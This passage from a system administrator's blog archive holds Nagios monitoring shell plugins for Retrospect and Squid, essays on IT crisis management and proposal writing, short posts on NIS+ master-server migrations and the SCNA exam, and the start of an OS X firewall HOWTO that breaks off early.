	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep retroclient | grep -v grep | grep -v nagios | wc -l` -lt 1 ]; then 
		echo "RETROSPECT NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes

echo "RETROSPECT OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_squid

2005-07-01 00:00:00

This script was written in the time I was hired by UPC / Liberty Global.

The text I wrote on Nagios Exchange about this script has been lost. I guess it speaks for itself :)



#!/usr/bin/bash
#
# Squid process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_squid
#
# Description:
# This plugin determines whether the Squid proxy server
# is running properly. It will check the following:
# * Are all required processes running?
# * Are all the required TCP/IP ports open?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when the abovementioned criteria are
# not matched
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Squid monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep squid | grep -v grep | grep -v nagios | wc -l` -lt 2 ]; then 
		echo "SQUID NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_ports()
{
	PORTS=0
	PORTLIST="8080 3128 3130"
	for NUM in `echo $PORTLIST`; do
	if [ `netstat -an | grep LISTEN | grep $NUM | grep -v grep | wc -l` -lt 1 ]; then PORTS=1;fi
	done

	if [ $PORTS -eq 1 ]; then 
		echo "SQUID NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_ports

echo "SQUID OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus


kilala.nl tags: , , ,

View or add comments (curr. 0)

When disaster strikes! Thomas and Roland discuss crisis management

2005-05-31 22:15:00

A PDF version of this document is available. Get it over here.

We've all experienced that sinking feeling: blurry-eyed and not halfway through your first cup of coffee you're startled by the phone. Something's gone horribly wrong and your customers demand your immediate attention!

From then on things usually only get worse. Everybody's working on the same problem. Nobody keeps track of who's doing what. The problem has more depth to it than you ever imagined and your customers keep on calling back for updates. It doesn't matter whether the company is small or large: we've all been there at some point in time.

The last time we encountered such an incident at our company wasn't too long ago. It wasn't a pretty sight and actually went pretty much as described above. During the final analysis our manager requested that we produce a small checklist which would prevent us from making the same mistakes again. The small checklist finally grew into this article which we thought might be useful for other system administrators as well.

Before we begin we'd like to mention that this article was written with our current employer in mind: large support departments, multiple tiers of management, a few hundred servers and an organization styled after ITIL. Most of the principles that are described in this document also apply to smaller departments and companies albeit in a more streamlined form. Meetings will not be as formal, troubleshooting will be more supple and communication lines between you and the customer will be shorter.

Now, we have been told that ITIL is a mostly European phenomenon and that it is still relatively unknown in the US and Asia. The web site of the British Office of Government Commerce (http://www.itil.co.uk) describes ITIL as follows:

"ITIL (IT Infrastructure Library) is the most widely accepted approach to IT Service Management in the world. ITIL provides a cohesive set of best practice, drawn from the public and private sectors internationally.



ITIL is ... supported by publications, qualifications and an international user group. ITIL is intended to assist organizations to develop a framework for IT Service Management."

Some readers may find our recommendations to be strict, while other may find them completely over the top. It is of course up to your own discretion how you deal with crises.

Now. Enough with the disclaimers. On with the show!

A method to the madness

The following paragraphs outline the phases which one should go through when managing a crisis. The way we see things, phases 1 through 3 and phase 11 are all parts of the normal day to day operations. All steps in between (4 through 10) are steps to be taken by the specially formed crisis team.

1. A fault is detected

2. First analysis

3. First crisis meeting

4. Deciding on a course of action

5. Assigning tasks

6. Troubleshooting

7. Second crisis meeting

8. Fixing the problems

9. Verification of functionality

10. Final analysis

11. Aftercare

1. A fault is detected

"Oh the humanity!..."

Reporter at the crash of the Hindenburg

I really doesn't matter how this happens, but this is naturally the beginning. Either you notice something while V-grepping through a log file, or a customer calls you, or some alarm bell starts going off in your monitoring software. The end result will be the same: something has gone wrong and people complain about it.

In most cases the occurrence will simply continue through the normal incident process since the situation is not of a grand scale. But once every so often something very important breaks and that's when this procedure kicks in.

2. First analysis

"Elementary, dear Watson."

The famous (yet imaginary) detective Sherlock Holmes

To be sure of the scale of the situation you'll have to make a quick inventory:

Once you have collected all of this information you will be able to provide your management with a clear picture of the current situation. It will also form the basis for the crisis meeting, which we will discuss next.

This phase underlines the absolute need for detailed and exhaustive documentation of your systems and applications! Things will go so much smoother if you have all of the required details available.1 If you already have things like Disaster Recovery Plans lying around, gather them now.

If you don't have any centralized documentation yet we'd recommend that you start right now. Start building a CMDB, lists of contacts and so-called build documents describing each server.

3. First crisis meeting

"Emergency family meeting!"

From "Cheaper by the dozen"

Now the time has come to determine how to tackle the problem at hand. In order to do this in an orderly fashion you will need to have a small crisis meeting.

Make sure that you have a whiteboard handy, so you can make a list of all of the detected defects. Later on this will make it easier to keep track of progress with the added benefit that the rest of your department won't have to disturb you for updates.

Gather the following people:

During this meeting the on-call team member brings everybody up to speed. The supervisor is present so that he/she may be prepared for any escalation from above, while the problem manager needs to be able to inform the rest of your company through the ITIL problem process. Of course it is clear why all of the other people are invited.

4. Deciding on a course of action

One of the goals of the first crisis meeting is to determine a course of action. You will need to set out a clear list of things that will be checked and of actions that need to be taken, to prevent confusion along the way.

It is possible that your department already has documents like a Disaster Recovery Plan or notes from a previous comparable crisis that describe how to treat your current situation. If you do, follow them to the letter. If you do not have documents such as these you will need to continue with the rest of our procedure.

5. Assigning tasks

Once a clear list of actions and checks has been created you will have to assign tasks to a number of people. We have determined a number of standard roles:

It is imperative that the spokesperson is not involved with any troubleshooting whatsoever. Should the need arise for the spokesperson to get involved, then somebody else should assume the role of spokesperson in his place. This will ensure that lines of communication don't get muddled and that the real work can go on like it should.

6. Troubleshooting

In this phase the designated troubleshooters go over the list of possible checks that was determined in the first crisis meeting. The results for each check need to be recorded of course.

It might be that they find some obvious mistakes that may have led to the situation at hand. We suggest that you refrain from fixing any of these, unless they are really minor. The point is that it would be wiser to save these errors for the meeting that is discussed next.

This might seem counterintuitive, but it could be that these errors aren't related to the fault or that fixing them might lead to other problems. This is why it's wiser to discuss these findings first.

7. Second crisis meeting

Once the troubleshooters have gathered all of their data the crisis team can enter a second meeting.

At this point in time it is not necessary to have either the supervisor or the problem manager present. The spokesperson and the troubleshooters (perhaps assisted by a specialist who's not on the crisis team) will decide on the new course of action.

Hopefully you have found a number of bugs that are related to the fault. If you haven't, loop back to step 4 to decide on new things to check. If you did, now is the time to decide how to go about fixing things and in which order to tackle them.

Make a list of fixable errors and glance over possible corrections. Don't go into too much detail, since that will take up too much time. Leave the details to the person who's going to fix that particular item. Assign each item on the list to one of the troubleshooters, and decide in which order they should be fixed.

When you're done with that, start thinking about plan B. Yes, it's true that you have already invested a lot of time into troubleshooting your problems, but it might be that you will not be able to fix the problems in time. So decide on a time limit if it hasn't been determined for you and start thinking worst case scenario: "What if we don't make it? How are we going to make sure people can do their work anyway?O.

8. Fixing the problems

Obviously you'll now tackle each error, one by one. Make sure that you take notes of all of the changes that are made. Once more though (I'm starting to feel like the school teacher from The Wall): don't be tempted to do anything you shouldn't be doing.

Don't go fixing other faults you've detected. And absolutely do not use the downtime as a convenient time window to perform an upgrade you'd been planning of doing for a while.

9. Verification of functionality

Once you've gone over the list errors and have fixed everything verify that peace has been brought to the land, so to speak. Also verify that your customers can work again and that they experience no more inconvenience. Strike every fixed item from the whiteboard, so your colleagues are in the know.

If you find that there are still some problems left, or that your fixes broke something else, add them to the board and loop back to phase 3.

10. Final analysis

"Analysis not possible... We are lost in the universe of Olympus."

Shirka the board computer, from "Ulysses31"

Naturally your customers will want some explanation for all of the problems you caused them (so to speak). So gather all people involved with the crisis team and hold one final meeting. Go over all of the things you've discovered and make a neat list. Cover how each error was created and its repercussions. You may also want to explain how you'll prevent these errors from happening again in the future.

What you do with this list depends entirely on the demands set out by your organization. It could be that all your customers want is a simple e-mail, while ITIL-reliant organizations may require a full blown Post Mortem.

11. Aftercare

"I don't think any problem is solved unless at the end of the day you've turned it into a non-issue. I would say you're not doing your job properly if it's possible to have the same crisis twice.O

Salvaico, Sysadmintalk.com forum member

Apart from the Post Mortem which was already mentioned you need to take care of some other things.

Maybe you've discovered that the server in question is under powered or that the faults experienced were fixed in a newer version of the software involved. Things like these warrant the start of a new project at the cost of your customers. Or maybe you've found that your monitoring is lacking when it comes to the resource(s) that failed. This of course will lead to an internal project for your department.

All in all, aftercare covers all of the activities required to make sure that such a crisis never occurs again. And if you cannot prevent such a crisis from happening again you should document it painstakingly so that it may be solved quickly in the future.

Final thoughts

We sincerely hope that our article has provided you with some valuable tips and ideas. Managing crises is hard and confusing work and it's always a good idea to take a structured approach. Keeping a clear and level head will be the biggest help you can find!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Rebuilding your company's network

2005-03-14 06:51:00

Currently listening to "Ode to my family" by the Cranberries.

Wooh boy, what a weekend! I never knew that changing one simple IP address on a server could have such pronounced effects.

Due to our IP ranges at work being too limited the Networks department has been working hard to get new switches installed. They're moving all of our servers from VLANs with a netmask of 255.255.255.192 to ones with a netmask of 255.255.255.0. As you can imagine this broadens the range of one VLAN significantly. That all sounds good, right? Well, naturally we need to be present to change the IP settings for all of our servers. Also, not too much work. Were it not for the fact that two of the servers being moved are replica servers for BoKS and NIS+.

Now normally these transitions aren't that difficult to perform, were it not for the fact that NIS+ had decided to act like an utter bitch for the weekend! After moving the server to its new switch we needed to rebuild it as a replica in order to propagate the new IP to all of its clients through the master. Usually this takes about half an hour, including the table copies. This time around though she was determined to cooperate as little as possible! Copying one table took about an hour from entering the command to finishing the copy!

All in all it cost me the better part of seven hours to get everything in place! Grrargh. But, in my defense, that includes reconfiguring all BoKS client systems and waiting until Networks had laid out the required patches :[


kilala.nl tags: ,

View or add comments (curr. 0)

Migrating to a new NIS+ master

2005-02-21 08:30:00

Currently listening to "Press Conference rag" from the musical Chicago.

What a relief! we finally managed to move NIS+ to a new Master server. We put in about twelve hours on saturday, but we finally got that bitch tamed! :) Proper credit needs to be awarded, so I would like to say that our success was mostly due to the scripts which had been crafted by Jeroen and Roland.


kilala.nl tags: , ,

View or add comments (curr. 0)

Switching NIS+ to a new master server

2005-01-16 15:38:00

Bad news for those sysadmins out there waiting for news regarding the NIS+. We tried our best yesterday, but moving NIS+ to a new Master server failed again :( This time around we used a tried and true (although much improved upon by Jeroen) procedure, which is usually reserved for worst case scenarios. Unfortunately we ran into some unforeseen problems. I'll tell you more about them when I deliver the _real_ procedure.


kilala.nl tags: , ,

View or add comments (curr. 0)

Zen and the art of getting what you want

2004-12-03 18:43:00

A PDF version of this document is available. Get it over here.

Throughout the last two years I have written a number of technical proposals for my employer. These usually concerned either the acquisition of new hardware or modifications to our current infrastructure.

Strangely enough my colleagues didn't always get the same amount of success as I did, which got me to thinking about the question "How does one write a proper proposal anyway?".

In this mini-tutorial I'll provide a rough outline of what a proposal should contain, along with a number of examples. Throughout the document you'll also find a number of Do's and Don'ts to point out common mistakes.

You will also notice that I predominantly focus on the acquisition of hardware in my examples. This is due to the nature of my line of work, but let me say that the stuff I'll be explaining applies to many other topics. You may just as well apply them to desired changes to your network, some software that you would like to use and even to some half-assed move which you want to prevent management from making.

Now I've never been a great fan of war, but Sun Tzu really knew his stuff! Even today his philosophies on war and battle tactics are still valid and are regularly applied. And not just in the military, since these days it's not uncommon to see corporate busy-bodies reading "The art of war" while commuting to work. In between my stuff you'll find quotes from Sun Tzu which I thought were applicable to the subject matter.

Zen and the art of 'getting what you want'

"Though we have heard of stupid haste in war, cleverness has never been seen associated with long delays."

Sun Tzu ~ "The art of war"

It happens occasionally that I overhear my colleagues talking about one of their proposals. Sometimes the discussion is about the question of why their idea got shot down and "what the heck was wrong with the proposal?". They had copied a proposal that had worked in the past and replaced some information with their own. When asked to show me said proposal, I'm presented with two sheets of paper, of which one is the quote from our vendor's sales department. The other consists of 30% header/footer, a short blurb on what we want to buy and a big box repeating all of the pricing info.

The problem with such a document of course is the fact that management gets its nose rubbed in the fact that we want to spend their money (and loads of it too). To them such a proposal consists of a lot of indecipherable technical mumbo-jumbo (being the quote and some technical stuff), with the rest of the document taking up dollars-Dollars-DOLLARS. While to you it may seem that the four or five lines of explanation provide enough reason to buy the new hardware, to management this will simply not do.

So? One of the things it takes to write a proper proposal is to write one which keeps your organization's upper echelons in mind. However! Don't forget about your colleagues either. It is more than logical that you run a proposition past your peer to check if they agree with all of the technicalities.

So in order to make sure that both your targets agree on your proposal you will have to:

A) employ tech-speak to reach your peers and

B) explain your reasoning in detail to your management.

In order to craft such a document there are a number of standard pieces to the puzzle which you can put in place. I'll go over them one by one. One thing I want you to realize though, is the fact that this will take time. Expect to spend at least half a day or even more on writing.

Pieces to the puzzle

My proposals tend to consist of a number of sections, some of which are optional as not every type of proposal requires the information contained therein. For instance, not every project will require resources which can be easily expressed in numbers and hence there is no need for a list of costs.

  1. A summary: describes in short your current problem, your solution for this and the estimated costs.
  2. Introducing the scope: gives your audience a clear picture of the troubled environment involved.
  3. Problems and solutions: describes in detail what is wrong, what the repercussions are (and what they may become) and your proposed solution.
  4. What is required? A list of things that you'll need to fix the problem.
  5. Other options: of course management wants the ability to save money. Here's where you give them the option to.
  6. Making it work: describes which departments need to put in resources and what their tasks will be.
  7. A break-down: the costs of the various options, set off against their merits and flaws.
  8. Final words: a least plea to your audience.

1. A summary

"The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him."

Sun Tzu ~ "The art of war"

Keep this part as short and simple as possible. Use one, maybe two short paragraphs to describe the current situation or problem and describe how you'll fix it. Use very general terms and make sure that it is clear which of the reader's needs you are addressing.

Be very careful not to put too much stuff in this section. Its main purpose is to provide the reader with a quick overview on what the the problem is that you're trying to solve and what your final goal is. Not only will this allow the reader to quickly grasp the subject of your proposal, but it will also make sure that it will be more easily found on a cluttered desk. A short summary means quick recognition.

For example:

In the past year UNIX Support have put a big effort into improving the stability and performance capacity of their BoKS and NIS+ infrastructural systems. However, the oldest parts of our infrastructure have always fallen outside the scope of these projects and have thus started showing signs of instability. This in turn may lead to bigger problems, ending in the complete inaccessibility of our UNIX environment.



I propose that we upgrade these aging servers, thus preventing any possible stability issues. The current estimated cost of the project is $16,260.

2. Introducing the scope

Most managers only have a broad view on things that are going on in the levels beneath them when it comes down to the technical nitty-gritty. That's the main reason why you should include a short introduction on the the scope of your proposal.

Give a summary of the services that the infrastructure delivers to the "business". This helps management to form a sense of importance. If a certain service is crucial to your company's day to day operation, make sure that your reader knows this. If it will help paint a clearer picture you can include a simple graphic on the infrastructure involved.

The whole point of this section is to imprint it on management that you are trying to do something about their needs, not yours. It's one thing to supply you with resources to tickle one of your fancies, but it's a wholly different thing to pour money into something that they themselves need.

For example:

BoKS provides our whole UNIX environment with mechanisms for user authentication and authorization. NIS+ provides all of the Sun Solaris systems from that same environment with directory services, containing information on user accounts, printers, home directories and automated file transfer interfaces.



Without either of these services it will be impossible for us to maintain proper user management. Also, users will be unable to log in to their servers should either of these services fail. This applies to all departments making use of UNIX servers, from Application and Infrastructure Support, all the way through to the Dealing Room floor.

3. Problems and proposed solutions

"Whoever is first in the field and awaits the coming of the enemy, will be fresh for the fight; whoever is second in the field and has to hasten to battle will arrive exhausted." Sun Tzu ~ "The art of war"

Meaning: when writing your proposal try to keep every possible angle on your ideas into mind. Try to anticipate any questions your reader might have and bring your ideas in such a way that they will appeal to your audience. If you simply describe your goal, instead of providing proper motivation you'll be the one who "is second in the field".

In the previous section of your document you provided your audience with a quick description of the environment involved. Now you'll have to describe what's wrong with the current situation and what kind of effects it may have in the future. If your proposal covers the acquisition or upgrade of multiple objects, cover them separately. For each object define its purpose in the scope you outlined in the previous section. Describe why you will need to change their current state and provide a lengthy description of what will happen if you do not.

However, don't be tempted to exaggerate or to fudge details so things seem worse. First off a proposal which is overly negative may be received badly by your audience. And secondly, you will have to be able to prove all of the points you make. Not only will you look like an ass if you can't, but you may also be putting your job on the line! So try to find the middle road. Zen is all about balance, and so the 'art of getting what you want' should also be.

For example:

Recently the master server has been under increased load, causing both deterioration of performance and stability. This in turn may lead to problems with BoKS and with NIS+, which most probably will lead to symptoms like:

* Users will need more time to log into their UNIX accounts.

* Users may become unable to log into their UNIX accounts.

* User accounts and passwords may lose synchronocity.

Close off each sub-section (one per object) with a clearly marked recommendation and a small table outlining the differences between the current and the desired situation. Keep your recommendation and the table rather generic. Do not specify any specific models or makes of hardware yet.

Of course the example below is focused on the upgrading of a specific server, but you can use such a table to outline your recommendations regarding just about anything. Versions of software for example, or specifics regarding your network architecture. It will work for all kinds of proposals.

For example:

UNIX Support recommends upgrading the master server's hardware to match or exceed current demands on performance



System type: Sun Netra T1 200 (current), - (recommended)

Processor: Ultrasparc IIe, 500 MHz (current), 2x Ultrasparc IIIi, 1 GHz (recomm.)

Memory: 512 MB (current), 1 or 2 GB (recomm.)

Hard drives: 2x 18 GB + 2x 18 GB ext (current), 2x 36 GB, int. mirror (recomm.)

The whole point of this section of your proposal is to convince your readers that they're the captain of Titanic and that you're the guy who can spot the iceberg in time. All is not lost... Yet...

4. What is required to make this work?

"The general who wins a battle makes many calculations in his temple ere the battle is fought. The general who loses a battle makes but few calculations beforehand."

Sun Tzu ~ "The art of war"

Now that you have painted your scenario, and you've provided a vision on how to go about solving things you will need to provide an overview of what you will be needing.

Don't just cover the hardware you'll need to acquire, but also take your time to point out which software you'll need and more importantly: which departments will need to provide resources to implement your proposal. Of course, when it comes to guesstimates regarding time frames, you are allowed to add some slack. But try to keep your balance and provide your audience with an honest estimate.

One thing though: don't mention any figures on costs yet. You'll get to those later on in the proposal.

For example:

A suitable solution for both Replica servers would be the Sun Fire V210. These systems will come with two Ultrasparc II processors and 2 GB of RAM installed. This configuration provides more than enough processing power, but is actually cheaper than a lower spec-ed V210.

5. Other viable options

"Do not interfere with an army that is returning home. When you surround an army, leave an outlet free. Do not press a desperate foe too hard."

Sun Tzu ~ "The art of war"

The above quote seems to be embodied in one of Dilbert's philosophies these days: "Always give management a choice between multiple options, even if there is only one".

Of course, in Dilbert's world management will always choose the least desirable option, for instance choosing to call a new product the 'Chlamydia', because "it sounds Roman". It will be your task to make the option you want to implement to be the most desirable in the eyes of your readers.

In case your proposal involves spending money, this is where you tell management: "Alright, I know times are lean, so here's a number of other options. They're less suitable, but they'll get the job done". Any which way, be sure that even these alternatives will do the job you'd want them to. Never give management the possibility to choose an option that will not be usable in real life.

For example:

Technically speaking it is possible to cut costs back a little by ordering two new servers, instead of four, while re-using two older ones. This alternate scenario would cut the total costs back to about $ 8360,-- (excluding VAT).

If the main subject of your proposal is already the cheapest viable option, say so. Explain at length that you have painstakingly eked out every penny to come up with this proposal. Also mention that there are other options, but that they will cost more money/resources/whatever. Feel free to give some ball park figures.

For example:

Unfortunately there are no cheaper alternatives for the Replica systems. The Sun Fire V120 might have been an option, were it not for the following facts:

It is not in the support matrix as defined by UNIX Support.

It is not natively capable of running IP Multi Pathing.

It will reach its so-called End Of Life state this year.

Basically you need to make management feel good about their decision of giving you what want. You really don't want them to pick any other solution than the one you're proposing, but you are also obliged to tell them about any other viable possibilities.

6. Making it work

In the case of some projects you are going to need the help of other people. It doesn't matter if they are colleagues, people from other departments or external parties. In this section you will make a list of how many resources you are going to need from them.

You don't have to go into heavy details, so give a broad description of the tasks laid out for these other parties. Estimate how much time it will take to perform them in man-hours and also how many people you will need from each source. Not only will this give management a clear picture of all of your necessities, a list like this will also give your readers a sense of the scale of the whole project.

For example:

In order to implement the proposed changes to our overall security we will require the cooperation of a number of our peer departments: Information Risk Management (IRM) will need to provide AS and our customers with clear guidelines, describing the access protocols which will be allowed in the future. It is estimated that one person will require about 36 hours to handle all of the paper work.



Security Operations (GSO) will need to slightly modify their procedures and some of the elements of their administrative tools, to accommodate for the stricter security guidelines. It is estimated that one person will need about 25 hours to make the required alterations.

7. Breaking things down

You'll need to try and keep this section as short as possible, since it covers the costs of all of the viable options that you provided in the past sections. Create a small table, setting off each option against the costs involved. Add a number of columns with simple flags which you can use to steer the reader to the option of your choice.

Reading back I realize that I'll need to clarify that a bit :) Try and recall some of those consumer magazines or sites on the web. Whenever they make a comparison between products they often include a number of columns marked with symbols like + (satisfactory), ++ (exceeds expectations), - (not too good) or -- (horrific). What you'll be doing is thinking of a number of qualities of your options which you can set off against each other.

It goes without saying that you should be honest when assigning these values. If another option starts to look more desirable by now you really have to re-evaluate your proposal.

For example:

A table detailing your various options.

8. Final words

"The clever combatant imposes his will on the enemy, but does not allow the enemy's will to be imposed on him."

Sun Tzu ~ "The art of war"

Use two, maybe three, paragraphs to make one final impressing blow on the reader. Shortly summarize the change(s) that you're proposing and repeat your arguments. Be firm, yet understanding in your writing.

For example:

We have provided you with a number of possible scenarios for replacement, some options more desirable than others. In the end however we are adamant that replacement of these systems is necessary and that postponing these actions may lead to serious problems within our UNIX environment, and thus in our line of business.

Regarding tone and use of language

At all times keep in mind who your target audience is. It is quite easy to fall back into your daily speech patterns when writing an extensive document, while at some point that may actually lead to catastrophe.

Assume that it is alright to use daily speech patterns in a document which will not pass farther than one tier above your level (meaning your supervisor and your colleagues). However, once you start moving beyond that level you will really need to tone down.

Some points of advise:

Regarding versioning and revisioning

At my current employer we have made a habit of including a small table at the beginning of each document which outlines all of the versions this document has gone through. It shows when each version was written and by whom. It also gives a one-liner regarding the modifications and finally each version has a separate line showing who reviewed the document.

Of course it may be wise to you use different tables at times. One table for versions that you pass between yourself and your colleagues and one for the copies that you hand out to management. Be sure to include a line for the review performed by your supervisor in both tables. It's an important step in the life cycle of your proposal.

This may be taking things a bit far for you, but it's something we've grown accustomed to.

Final thoughts

"Begin by seizing something which your opponent holds dear; then he will be amenable to your will." Sun Tzu ~ "The art of war"

Or in other words: management is almost sure to give in, if you simply make sure they know things will go horribly wrong with their environment if you are not allowed to do what you just proposed.

Of course no method is the be-all-and-end-all way of writing proposals, so naturally neither is mine. Some may simply find it too elaborate, while in other cases management may not be very susceptible to this approach. Try and find your own middle road between effort and yield. Just be sure to take your time and to be prepared for any questions you may get about your proposal.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Hacking NIS+ and BoKS

2004-11-17 18:25:00

Holy moly, what a weekend! I can tell you guys right now that the procedure I wrote for switching NIS+ master servers is NOT fool proof! We had planned to only take about four hours at a max, for switching both NIS+ and BoKS over to a new master server. Unfortunately it turned out that we would only get to spend one hour on switching NIS+ until things went horribly sour.

In the end I spent a total of eightteen hours in the office on Saturday and Sunday. I'll spare you the gory details for now (I'll incorporate them in version 2.0 of the master switch procedure).

But God, what a weekend! And the way it looks now we'll be repeating it in a week or so...

Aniwho... I'm still trying to put as much time as possible into my work for the convention, but it's going slowly. I plan on spending every free minute of coming thursday on my Foundation work though. That should get me along the way nicely.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Moving NIS+ to a new master server

2004-11-15 20:14:00

Finally got round to writing the "Switch to a new master" procedure for NIS+. This procedure is damn handy when you want to move your current NIS+ root master to new hardware. This is something that we'll be doing at my employer on the 20th of November, so I'll keep you guys posted. I'll also be sure to update the procedure should anything go wrong :]


kilala.nl tags: , ,

View or add comments (curr. 0)

Additions to the Sysadmin section

2004-11-15 19:17:00

More expansion in the UNIX Sysadmin section! I've added procedures for initialising new NIS+ clients and for switching NIS+ over to a new master server.


kilala.nl tags: ,

View or add comments (curr. 0)

Writing more articles

2004-11-11 21:55:00

The way things are looking right now I'll be writing a whole series of articles for the discerning system admin :) As you know I finished an article on the crafting of proposals a week or so ago. Now I'm also planning to do articles on "keeping personal and project plannings" and on "catastrophe management".

I'll also be using my lovely Powermac G5 for something completely new today! At the office we lost two passwords for NIS+ credentials and luckily we managed to retrieve what we _think_ are the encrypted passwords strings. So now I'll try and use John the Ripper to crack the passwords. I've no clue how long this'll take and I hope I can get things finished before the 20th. 'Cause that's when I need the damn passwords :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Reviewing NIS+ books

2004-11-11 19:51:00

I've added a little review page for books on the topic of NIS+, since that's something I'm currently very into at the office.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

How to write proposals

2004-11-01 09:33:00

Version 2.0 of my tutorial on writing proposals is available from the menu now. Share and enjoy!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Writing technical proposals

2004-10-23 09:05:00

Finally my work on the HOWTO for writing technical proposals is done! I've added the PDF file to the menu bar on the left. Unfortunately, for some reason PDF printing from OpenOffice doesn't always seem to work properly. The file in the menu bar prints perfectly when dragged onto my desktop printer (albeit in black and white, and not in color), but both Preview and Acrobat Reader refuse to open the file.

If any of you guys happen to have any problems opening the file, please let me know. I'll see what I can do to get things fixed.


kilala.nl tags: , , ,

View or add comments (curr. 0)

SCNA erratum

2004-09-22 20:01:00

In the menu of the Sysadmin section you will also find a link to a small erratum which I wrote after reading Rick Bushnell's book. As you can see I found quite a number of errors. I also e-mailed this list to Prentice Hall publishers and hope that they will make proper use of the list.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Passed my SCNA exam

2004-09-22 13:26:00

Booyeah! While I can't say that I aced the SCNA exam, I'm still extremely happy with my score: an 89% (52 out of 58 scored questions).


kilala.nl tags: , , ,

View or add comments (curr. 0)

SCNA summary done!

2004-09-15 22:13:00

Well, it took me a couple of days, but finally it's done: my summary own the "SCNA study guide" by Rick Bushnell (see the book list). I'll be taking my first shot at the SCNA exam in about a week (the 22nd, keeping my fingers crossed), so I'm happy that I've finished the document. I thought I'd share it with the rest of you; maybe it'll be of some use.

All 29 pages are available for download as a PDF from the Sysadmin section.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

Burn baby burn! Configuring the OS X firewall.

2004-04-03 00:00:00

It's only been a couple of months since I switched to Apple OS X, but since then I've learnt many a thing about the OS. It was only recently though that I found the need to configure the built in firewall. This little HOWTO'll explain all of the steps I took.

The built in firewall software is one of the many OS X features that Apple likes to tote around, claiming a higher level of security out of the box when compared to other OSes. And yes indeed the firewall software does appear to do its job properly. With one exception...

Conventions used within this document

Before we begin I would like to point out a couple of conventions I will be using in this document. Whenever you encounter any text written in courier new bold, this means that you're either reading commands which need to be entered into the UNIX command line of OS X or a list of packages or menu names. You will also encounter lines starting with the text "kilala:~ thomas$". This is merely the command prompt as displayed on my system and I include it in these texts to indicate the commands to be entered.

Firewalls? What the heck?...

First off I can imagine that some of the people reading this can't even begin to imagine what a firewall is or does. They might've heard the word before on the web or in Apple's (or Microsoft's) PR spiel. I won't go into any technical details, but I'll give a short explanation on the ideas behind a firewall. If you would like more detailed information I recommend a website like http://computer.howstuffworks.com/firewall.htm.

Firewalls are a sort of security measure which work by separating your computer or network from a possibly hostile network, like the Internet. This separation usually takes place by disallowing any and all network traffic to and from your systems, while only allowing a certain number of protocols in and/or out. For instance, a home user may setup his firewall to block everything except outgoing e-mail and browser traffic. On the other hand some companies could be allowing incoming browser requests to their own webserver, next to the already mentioned outgoing e-mail and browser traffic.

One of the most important things to remember though is the fact that a firewall is not the be-all-end-all security measure that fixes all of your problems. It could still be that the software serving the protocols that you do allow through the firewall is buggy with security flaws. Think of Microsoft's ISS webserver software which was famous for security holes in the past.

OS X! What's the problem?

As I said it was only recently that I found the need to manually configure OS X's built in firewall software. I'd always kind of expected the software to work straight out of the box, which it kind of did.

You see, usually with firewall software you'll say "I want to block any and all traffic to and from my box, except this, this and that protocol". Basically you do the same with OS X's firewall, but with a small snake in the grass: the protocols you allow to go in and out of your systems get permission on all of your network interfaces! So if you're hooked up onto the Internet (which I assume since you found my little article) and if you decide to turn on that Windows file sharing, remember that you're sharing your files with the rest of the Internet! You can imagine I was less than pleased with this and I can't even begin to imagine why it took me two months to start thinking about this. Usually I'm more security minded! Anywho, the damage was done and I decided to quickly learn enough about the OS X firewall, so I could configure it properly.

Reconfiguring the OS X firewall

I quickly found out that OS X uses the BSD UNIX default firewall ipfw, which can be configured in many different ways. There's Apple's custom window in the System Preferences panes. Then there are GUI's like Brickhouse and Firewalker which are available through the Internet. And finally you can take the manual approach and enter ipfw firewall rules one by one, by hand.

I chose to use the manual approach, since that is what I'm most familiar with; I've been entering firewall rules since my internship at Spherion when I was still running a firewall on Suse Linux 6.0. An added bonus to entering the rules by hand is that you know 100% sure what the firewall will do, as opposed to rules created or generated by a GUI.

I wouldn't expect Joe and Little Timmy from across the street to use to approach, so I would recommend people who're less technically involved to give software like Brickhouse a try. I hear it's supposed to be pretty good!

For the lazy people...

